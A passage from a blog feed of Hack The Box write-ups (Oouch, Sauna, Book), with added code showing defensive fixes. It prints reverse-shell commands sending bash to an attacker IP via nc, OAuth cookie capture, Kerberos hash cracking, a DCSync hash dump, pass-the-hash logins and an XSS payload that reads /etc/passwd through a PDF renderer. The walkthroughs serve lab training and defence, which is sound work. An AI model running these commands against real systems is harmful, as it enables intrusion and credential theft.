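<p>The consumer accepts a code from whichever browser presents it, with nothing tying the code back to the session that began the flow. The standard fix is the OAuth <code class="language-plaintext highlighter-rouge">state</code> parameter: the consumer generates it per session, sends it to the authorization server, and rejects any callback whose state it did not issue. The following is an added example, not Oouch’s code, that models both servers in a few lines and replays the scenario above against the vulnerable and the hardened callback; the session ids and user names are constructed.</p>

```python
# Added example (not Oouch's code): binding an OAuth authorization code to the browser
# session that started the flow, via the `state` parameter, on the consumer side.
import secrets


class AuthorizationServer:
    """Models the Django authorization server: issues single-use codes for a user."""

    def __init__(self):
        self.codes = {}

    def issue_code(self, user, state):
        code = secrets.token_urlsafe(24)
        self.codes[code] = (user, state)
        return code

    def redeem(self, code):
        entry = self.codes.pop(code, None)    # one use only, as on the box
        return entry[0] if entry else None


class Consumer:
    """Models the Flask consumer. `linked` maps a consumer session id to the
    authorization-server identity that was attached to it."""

    def __init__(self, authz):
        self.authz = authz
        self.sessions = {}
        self.linked = {}

    def start_login(self, session_id):
        """Step 1: fresh unguessable state, remembered in this session only."""
        state = secrets.token_urlsafe(32)
        self.sessions.setdefault(session_id, {})["oauth_state"] = state
        return f"/oauth/authorize/?response_type=code&state={state}"

    def callback_without_state_check(self, session_id, code):
        """Vulnerable shape: any session can redeem any unused code."""
        user = self.authz.redeem(code)
        if user is not None:
            self.linked[session_id] = user
        return user

    def callback(self, session_id, code, state):
        """Hardened shape: the state must be the one this very session issued."""
        expected = self.sessions.get(session_id, {}).pop("oauth_state", None)
        if expected is None or not secrets.compare_digest(expected, state):
            return None         # not the session that began this flow: refuse to link
        user = self.authz.redeem(code)
        if user is not None:
            self.linked[session_id] = user
        return user


def replay_scenario(check_state):
    """An attacker starts a flow as 'xaero', holds the code back, and gets the admin's
    browser to open the callback. Returns the identity linked to the admin's session."""
    authz = AuthorizationServer()
    consumer = Consumer(authz)
    attacker_state = consumer.start_login("attacker-session").split("state=")[1]
    code = authz.issue_code("xaero", attacker_state)      # intercepted, never redeemed by xaero
    # The admin's session never started a flow; it simply opens the link it was sent.
    if check_state:
        consumer.callback("admin-session", code, attacker_state)
    else:
        consumer.callback_without_state_check("admin-session", code)
    return consumer.linked.get("admin-session")
```

<p>Without the check, the admin’s session ends up linked to the attacker’s authorization identity, which is exactly the takeover described above. With it, the callback is refused because the admin’s session holds no matching state. PKCE gives the same binding for public clients and is the preferred mechanism in current OAuth guidance; the state check is the minimum the consumer should do regardless.</p>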
<p><img src="https://jdmce.com/assets/oouch/qtclogin.jpg" alt="Logged in as qtc" /></p>
<p>We can now look around the application as the user qtc. Under Documents we find some credentials.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dev_access.txt:
develop:supermegasecureklarabubu123! -> Allows application registration.
o_auth_notes.txt:
/api/get_user -> user data. oauth/authorize -> Now also supports GET method.
todo.txt:
Chris mentioned all users could obtain my ssh key. Must be a joke...
</code></pre></div></div>
<p>If we navigate to authorization.oouch.htb:8000/oauth/authorize we can log in with the credentials in dev_access.txt.</p>
<p>This takes us to a page that allows us to register a new application. So I register a new application, making a note of the clientID and Client Secret.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ClientId: raJLWuJstNTX1etAwn64hSg2BiVYyI7LGMVBJ4Xk
Client Secret: exo6Yrof5DE14jc4jmdYM3aJE22UlEQqZuwFY2DTYg2JWef4qRUCc2caLianx5GOOaF0NDnJfIUJvAfiXpuamxMv7Tn4BBvseBhx5GNV9w7se45oSa3xpDe2LA7GiirO
</code></pre></div></div>
<p>I set Client type to public and authorization grant type to Authorization Code, and the redirect url to my ip, http://10.10.14.53:9001.</p>
<p>We can then send the following link via the contact page.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://authorization.oouch.htb:8000/oauth/authorize/?client_id=raJLWuJstNTX1etAwn64hSg2BiVYyI7LGMVBJ4Xk&redirect_uri=http://10.10.14.53:9001&grant_type=authorization_code&client_secret=exo6Yrof5DE14jc4jmdYM3aJE22UlEQqZuwFY2DTYg2JWef4qRUCc2caLianx5GOOaF0NDnJfIUJvAfiXpuamxMv7Tn4BBvseBhx5GNV9w7se45oSa3xpDe2LA7GiirO
</code></pre></div></div>
<p>Listening on port 9001 with nc, we get a cookie!</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>listening on <span class="o">[</span>any] 9001 ...
connect to <span class="o">[</span>10.10.14.53] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.177] 47610
GET /?error<span class="o">=</span>invalid_request&error_description<span class="o">=</span>Missing+response_type+parameter. HTTP/1.1
Host: 10.10.14.53:9001
User-Agent: python-requests/2.21.0
Accept-Encoding: <span class="nb">gzip</span>, deflate
Accept: <span class="k">*</span>/<span class="k">*</span>
Connection: keep-alive
Cookie: <span class="nv">sessionid</span><span class="o">=</span>fi4v1qnvk1knx2e6xwc39h0k4xn553pp<span class="p">;</span>
</code></pre></div></div>
<p>We can continue the authorization process:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-X</span> POST <span class="s1">'http://authorization.oouch.htb:8000/oauth/token/'</span> <span class="nt">-H</span> <span class="s2">"Content-Type: application/x-www-form-urlencoded"</span> <span class="nt">--data</span> <span class="s2">"grant_type=client_credentials&client_id=raJLWuJstNTX1etAwn64hSg2BiVYyI7LGMVBJ4Xk&client_secret=exo6Yrof5DE14jc4jmdYM3aJE22UlEQqZuwFY2DTYg2JWef4qRUCc2caLianx5GOOaF0NDnJfIUJvAfiXpuamxMv7Tn4BBvseBhx5GNV9w7se45oSa3xpDe2LA7GiirO"</span> <span class="nt">-L</span> <span class="nt">-s</span>
</code></pre></div></div>
<p>And we get back an access token.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{"access_token": "s4nQEuR9zdEjuwYSev1ujxTpWTcx23", "expires_in": 600, "token_type": "Bearer", "scope": "read write"}
</code></pre></div></div>
<p>We can now use this access token to call get_ssh from the API.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://authorization.oouch.htb:8000/api/get_ssh/?access_token<span class="o">=</span>s4nQEuR9zdEjuwYSev1ujxTpWTcx23
</code></pre></div></div>
<p>Which returns the SSH key for qtc.</p>
<p><img src="https://jdmce.com/assets/oouch/qtcssh.jpg" alt="SSH as qtc" /></p>
<h3 id="privilege-escalation">Privilege Escalation</h3>
<p>linpeas.sh doesn’t return any useful information, although we do see that docker is running.</p>
<p>There is a hidden file in qtc’s home folder called .note.txt:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Implementing an IPS using DBus and iptables == Genius?
</code></pre></div></div>
<p>Running <code class="language-plaintext highlighter-rouge">ip add</code> we see a number of interfaces.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>...
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
<span class="nb">link</span>/ether 02:42:8f:65:6f:0b brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
4: br-cc6c78e0c7d0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
<span class="nb">link</span>/ether 02:42:10:1f:7a:9e brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-cc6c78e0c7d0
valid_lft forever preferred_lft forever
inet6 fe80::42:10ff:fe1f:7a9e/64 scope <span class="nb">link
</span>valid_lft forever preferred_lft forever
...
</code></pre></div></div>
<p>We can SSH into the docker container as qtc. (I tried a number of IPs before it worked, you could write a script to ping IP addresses but I didn’t)</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh <span class="nt">-i</span> .ssh/id_rsa qtc@172.18.0.3
</code></pre></div></div>
<p>There is an interesting directory /code. It contains the code for the application running on port 5000.</p>
<p>Based on the note and poking around in the code directory, we figure that we can exploit dbus to get root; however, we cannot run dbus-send as the current user, since dbus is owned by root.</p>
<p>We can begin by exploiting the uwsgi service.</p>
<p>We can get the version number:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>uwsgi <span class="nt">--version</span>
2.0.17.1
</code></pre></div></div>
<p>Using this information we can find this <a href="https://github.com/wofeiwo/webcgi-exploits/blob/master/python/uwsgi_exp.py">exploit</a>.</p>
<p>The sz function requires a small change:</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def sz(x):
    # encode an int (or the length of a payload) as a 2-byte little-endian field
    s = hex(x if isinstance(x, int) else len(x))[2:].rjust(4, '0')
    s = bytes.fromhex(s)
    return s[::-1]
</code></pre></div></div>
<p>First we need to transfer uwsgi_exp.py and nc to /tmp in the docker container, then run</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python ./uwsgi_exp.py <span class="nt">-m</span> unix <span class="nt">-u</span> /tmp/uwsgi.socket <span class="nt">-c</span> <span class="s2">"/tmp/nc -e /bin/bash 172.18.0.1 1234"</span>
</code></pre></div></div>
<p>We listen on oouch as qtc and get a shell as www-data; this user can run dbus-send.</p>
<p>We can now use dbus-send to get a shell as root. Listening on port 9002 on the attacking machine, run:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dbus-send <span class="nt">--system</span> <span class="nt">--print-reply</span> <span class="nt">--dest</span><span class="o">=</span>htb.oouch.Block /htb/oouch/Block htb.oouch.Block.Block <span class="s2">"/bin/bash -i 2>&1 | nc 10.10.14.53 9002 >/tmp/.0;"</span>
</code></pre></div></div>
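<p>The root shell comes from the Block method treating its argument as shell text. Here is the shape that method should have, as an added example that is not the box’s htb.oouch.Block service: the argument must parse as an IP address and is passed to iptables as a discrete argv element with no shell involved, so anything else is rejected before a command exists. The <code class="language-plaintext highlighter-rouge">run</code> parameter is an assumption that lets the logic be exercised without root.</p>

```python
# Added example (not the box's dbus service): a Block method that validates its argument
# as an IP literal and execs iptables with an argv list, never through a shell.
import ipaddress
import shlex
import subprocess


def command_line_with_shell(value):
    """The vulnerable pattern: the caller's string is interpolated into shell text,
    so shell metacharacters in `value` become part of the command."""
    return f"iptables -I INPUT -s {value} -j DROP"


def iptables_argv(value):
    """Validate `value` as an IPv4/IPv6 literal and build an argv list (no shell).
    Raises ValueError for anything else, which is the safe outcome for injected text."""
    addr = ipaddress.ip_address(value.strip())
    tool = "ip6tables" if addr.version == 6 else "iptables"
    return [tool, "-I", "INPUT", "-s", str(addr), "-j", "DROP"]


def block(value, run=subprocess.run):
    """Hardened Block(): validated argument, argv list, shell never involved.
    `run` is injectable so the logic can be tested without root or iptables installed."""
    return run(iptables_argv(value), check=True)


def describe(argv):
    """Logging helper: the quoted command line, for audit records only."""
    return shlex.join(argv)
```

<p>The same service should also be reachable only by the accounts that need it: a D-Bus policy that lets an unprivileged web worker call a root-owned Block method turns any injection in the web tier into a root shell, as this box shows.</p>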
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@oouch:/root# <span class="nb">cat </span>root.txt
</code></pre></div></div>John McEwanOouch is a hard machine on Hack the Box, the foothold requires exploiting a misconfiguration in Oauth, then exploiting dbus to gain root access.[HTB] Sauna WriteUp2020-07-22T13:00:00+01:002020-07-22T13:00:00+01:00https://jdmce.com/hack%20the%20box/%5BHTB%5D-Sauna-Writeup<p><img src="https://jdmce.com/assets/sauna/sauna.jpg" alt="Sauna" /></p>
<p>Sauna is an easy Windows machine on Hack The Box. A user is Kerberoastable, which leads to a second user, and then a DCSync attack leads to administrator.</p>
<p>Begin with an nmap scan.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -sV -sC -oN nmap/nmap 10.10.10.175
# Nmap 7.80 scan initiated Mon May 18 20:41:01 2020 as: nmap -sV -sC -oN nmap/nmap 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.078s latency).
Not shown: 988 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-19 03:45:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=5/18%Time=5EC2E4E6%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 18 20:45:47 2020 -- 1 IP address (1 host up) scanned in 285.85 seconds
</code></pre></div></div>
<p>A number of ports are open; I start with the website running on port 80.</p>
<p>Not much can be found on the website. The about page lists members of the team, which we can use to generate usernames.</p>
<p><img src="https://jdmce.com/assets/sauna/meettheteam.jpg" alt="Meet the Team" /></p>
<p>I also ran ldapsearch against the machine; this reveals a user Hugo Smith, but this turned out to be a rabbit hole. The real user we will need to go after is Fergus Smith.</p>
<p><code class="language-plaintext highlighter-rouge">ldapsearch -h 10.10.10.175 -p 389 -x -b 'dc=EGOTISTICAL-BANK,dc=local' > ldapsearch.txt</code></p>
<p>We can use <a href="https://github.com/ropnop/kerbrute">Kerbrute</a> to find valid usernames based on the names on the website. First I create a text file with some common username formats, then run Kerbrute.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./kerbrute userenum <span class="nt">--dc</span> 10.10.10.175 <span class="nt">-d</span> EGOTISTICAL-BANK.LOCAL usernames.txt
<span class="o">[</span>+] VALID USERNAME: administrator@EGOTISTICAL-BANK.LOCAL
<span class="o">[</span>+] VALID USERNAME: FSmith@EGOTISTICAL-BANK.LOCAL
</code></pre></div></div>
<p>Kerbrute identifies administrator and FSmith. This user is kerberoastable, so we can use the <a href="https://github.com/SecureAuthCorp/impacket">impacket</a> script GetUserSPNs.py to get the TGT for FSmith.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>python ./GetUserSPNs.py <span class="nt">-dc-ip</span> 10.10.10.175 <span class="nt">-no-pass</span> <span class="nt">-k</span> EGOTISTICAL-BANK.LOCAL/FSMITH
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Getting TGT <span class="k">for </span>FSMITH
<span class="nv">$krb5asrep$23$FSMITH</span>@EGOTISTICAL-BANK.LOCAL:237e94674c738dc86e2b8033c54e259b<span class="nv">$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</span>
</code></pre></div></div>
<p>We can then use john to crack the hash.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>john FSMITHhash <span class="nt">--fork</span><span class="o">=</span>4 <span class="nt">-w</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt
</code></pre></div></div>
<p>We get the password <code class="language-plaintext highlighter-rouge">Thestrokes23</code>.</p>
<p>Now we can use Evil-winrm to log into the box.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>evil-winrm <span class="nt">-i</span> 10.10.10.175 <span class="nt">-u</span> FSMITH <span class="nt">-p</span> Thestrokes23
</code></pre></div></div>
<p>C:\users\fsmith\desktop\user.txt</p>
<h3 id="privilege-escalation">Privilege Escalation</h3>
<p>Running winPEAS identifies a user svc_loanmanager which has autologon enabled and a default password.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="o">[</span>+] Looking <span class="k">for </span>AutoLogon credentials<span class="o">(</span>T1012<span class="o">)</span>
Some AutoLogon credentials were found!!
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK<span class="se">\s</span>vc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
</code></pre></div></div>
<p>We can open a new remote session as svc_loanmgr. (Under C:\users\ we see that the account actually logs in as svc_loanmgr, not svc_loanmanager.)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
</code></pre></div></div>
<p>We can now use BloodHound to find potential paths to Domain Admin.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bloodhound-python <span class="nt">-u</span> svc_loanmgr <span class="nt">-p</span> Moneymakestheworldgoround! <span class="nt">-d</span> EGOTISTICAL-BANK.LOCAL <span class="nt">-ns</span> 10.10.10.175 <span class="nt">-c</span> All
</code></pre></div></div>
<p>Looking through the BloodHound results we find that the svc_loanmgr user can leak password hashes from the Domain Controller using a DCSync attack. This works by impersonating a new Domain Controller and requesting synchronisation of the directory from the existing DC.</p>
<p>We can use another Impacket script to perform this attack.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>secretsdump.py egotisticalbank/svc_loanmgr@10.10.10.175
Impacket v0.9.22.dev1+20200518.92028.525fa3d0 - Copyright 2020 SecureAuth Corporation
Password:
<span class="o">[</span>-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Dumping Domain Credentials <span class="o">(</span>domain<span class="se">\u</span><span class="nb">id</span>:rid:lmhash:nthash<span class="o">)</span>
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL<span class="se">\H</span>Smith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL<span class="se">\F</span>Smith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL<span class="se">\s</span>vc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA<span class="nv">$:</span>1000:aad3b435b51404eeaad3b435b51404ee:ec048b4c6a47762bb522a7a4d302670b:::
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL<span class="se">\H</span>Smith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL<span class="se">\H</span>Smith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL<span class="se">\H</span>Smith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL<span class="se">\F</span>Smith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL<span class="se">\F</span>Smith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL<span class="se">\F</span>Smith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL<span class="se">\s</span>vc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL<span class="se">\s</span>vc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL<span class="se">\s</span>vc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA<span class="nv">$:</span>aes256-cts-hmac-sha1-96:d1fb5eefd5831287eb278c5eb24ef19dee6f40aa3917ea8581762066ba88ac3b
SAUNA<span class="nv">$:</span>aes128-cts-hmac-sha1-96:f6e1682022cd138a00262c4910a7944b
SAUNA<span class="nv">$:</span>des-cbc-md5:46b0434967132c4f
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Cleaning up...
</code></pre></div></div>
<p>We can now use evil-winrm to pass the hash and log in as Administrator.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>evil-winrm <span class="nt">-i</span> 10.10.10.175 <span class="nt">-u</span> administrator <span class="nt">-H</span> :d9485863c1e9e05851aa40cbb4ab9dff
<span class="k">*</span>Evil-WinRM<span class="k">*</span> PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop> <span class="nb">type </span>root.txt
</code></pre></div></div>
<p>C:\users\administrator\desktop\root.txt</p>
John McEwan
Sauna is an easy Windows machine on Hack The Box. A user is Kerberoastable which leads to a second user, then a DCSync attack leads to administrator.
[HTB] Book WriteUp
2020-07-11T13:00:00+01:00
2020-07-11T13:00:00+01:00
https://jdmce.com/hack%20the%20box/%5BHTB%5D-Book-WriteUp
<p><img src="https://jdmce.com/assets/book/book.jpg" alt="Book" /></p>
<p>Book is a medium difficulty machine on Hack the Box.</p>
<p>As always we begin by running an nmap scan.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap <span class="nt">-sC</span> <span class="nt">-sV</span> <span class="nt">-oN</span> scans/nmap 10.10.10.176
</code></pre></div></div>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Nmap 7.80 scan initiated Thu May 14 18:48:42 2020 as: nmap -sC -sV -oN scans/nmap 10.10.10.176</span>
Nmap scan report <span class="k">for </span>10.10.10.176
Host is up <span class="o">(</span>0.030s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
| 2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 <span class="o">(</span>RSA<span class="o">)</span>
| 256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd <span class="o">(</span>ECDSA<span class="o">)</span>
|_ 256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open http Apache httpd 2.4.29 <span class="o">((</span>Ubuntu<span class="o">))</span>
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not <span class="nb">set</span>
|_http-server-header: Apache/2.4.29 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title: LIBRARY - Read | Learn | Have Fun
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
<span class="c"># Nmap done at Thu May 14 18:48:50 2020 -- 1 IP address (1 host up) scanned in 8.18 seconds</span>
</code></pre></div></div>
<p>There are two open ports, 22 and 80; let’s look at the website on port 80.</p>
<p><img src="https://jdmce.com/assets/book/login.jpg" alt="Login" /></p>
<p>We get a login page, so let’s sign up. When we sign in we arrive at a library website.</p>
<p><img src="https://jdmce.com/assets/book/library.jpg" alt="Library" /></p>
<p>After poking around a bit we find there is an admin account, admin@book.htb, on the contact page. We also see that the user’s page shows the user’s role. There is also an upload function on the collections page.</p>
<p>Running Dirbuster also finds a /admin/ page.</p>
<p>We can try signing up for a second account using the existing admin@book.htb address. Using BurpSuite we pad the email value out to 21 characters to bypass the JavaScript form validation; the padding can be spaces, and the final character is arbitrary.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>name=admin&email=admin@book.htb X&password=password1
</code></pre></div></div>
<p>After logging in to the admin account we see in the user settings that the account only has the ‘User’ role, and using the admin credentials on the /admin/ page doesn’t work. If we repeat the process but change the name to admin1 we are able to log in to the admin page.</p>
<p>On the Collections page, the admin is able to download the collection as a PDF. The site generates these PDFs from the information supplied by the user, so we can use DOM manipulation to execute JavaScript inside the PDF renderer, as described in this article:</p>
<p><a href="https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html">www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically</a></p>
<p>The following payload will return /etc/passwd.</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">x</span><span class="o">=</span><span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">;</span><span class="nx">x</span><span class="p">.</span><span class="nx">onload</span><span class="o">=</span><span class="kd">function</span><span class="p">(){</span><span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">responseText</span><span class="p">)};</span><span class="nx">x</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">"</span><span class="s2">GET</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">file:///etc/passwd</span><span class="dl">"</span><span class="p">);</span><span class="nx">x</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span><span class="o"><</span><span class="sr">/script</span><span class="err">>
</span></code></pre></div></div>
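From the defender’s side, the root cause is that user-supplied collection fields are concatenated straight into the HTML that the server-side PDF generator renders. The following is an added example, not the Book application’s code (which the write-up never shows): a hypothetical row template in its vulnerable and hardened forms, exercised with the exact payload above; the field names title and author are assumed.

```javascript
// Added example, not the Book application's own code: a hypothetical
// reconstruction of how a collections row reaches the HTML that the
// server-side PDF generator renders. Field names (title, author) are assumed.

// Constructed sample entry reusing the payload from the write-up.
const SAMPLE_ENTRY = {
  title: '<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};' +
         'x.open("GET","file:///etc/passwd");x.send();</script>',
  author: "example user",
};

// Vulnerable form: values are interpolated as raw markup. A headless browser
// rendering this to PDF executes the script with the renderer's own file:// access.
function renderRowVulnerable(entry) {
  return `<tr><td>${entry.title}</td><td>${entry.author}</td></tr>`;
}

// Escape the five characters that can change HTML context.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened form: every user-controlled value is escaped, so the payload is
// rendered as visible text instead of being parsed as a <script> element.
function renderRowHardened(entry) {
  return `<tr><td>${escapeHtml(entry.title)}</td><td>${escapeHtml(entry.author)}</td></tr>`;
}

// Heuristic last-line check before handing HTML to the renderer: refuse anything
// that still contains a script element, an inline event handler attribute or a
// javascript: URL. Escaping is the real fix; this catches template mistakes elsewhere.
function containsActiveContent(html) {
  return /<\s*script\b|\son[a-z]+\s*=|javascript:/i.test(html);
}

console.log("vulnerable:", containsActiveContent(renderRowVulnerable(SAMPLE_ENTRY))); // true
console.log("hardened:  ", containsActiveContent(renderRowHardened(SAMPLE_ENTRY)));   // false
```

Even with escaping in place, a renderer that can follow file:// URLs should be run with local file access disabled or inside a sandbox, since any other injection point would give the same read primitive.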
<p>After downloading the collections PDF we get /etc/passwd:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
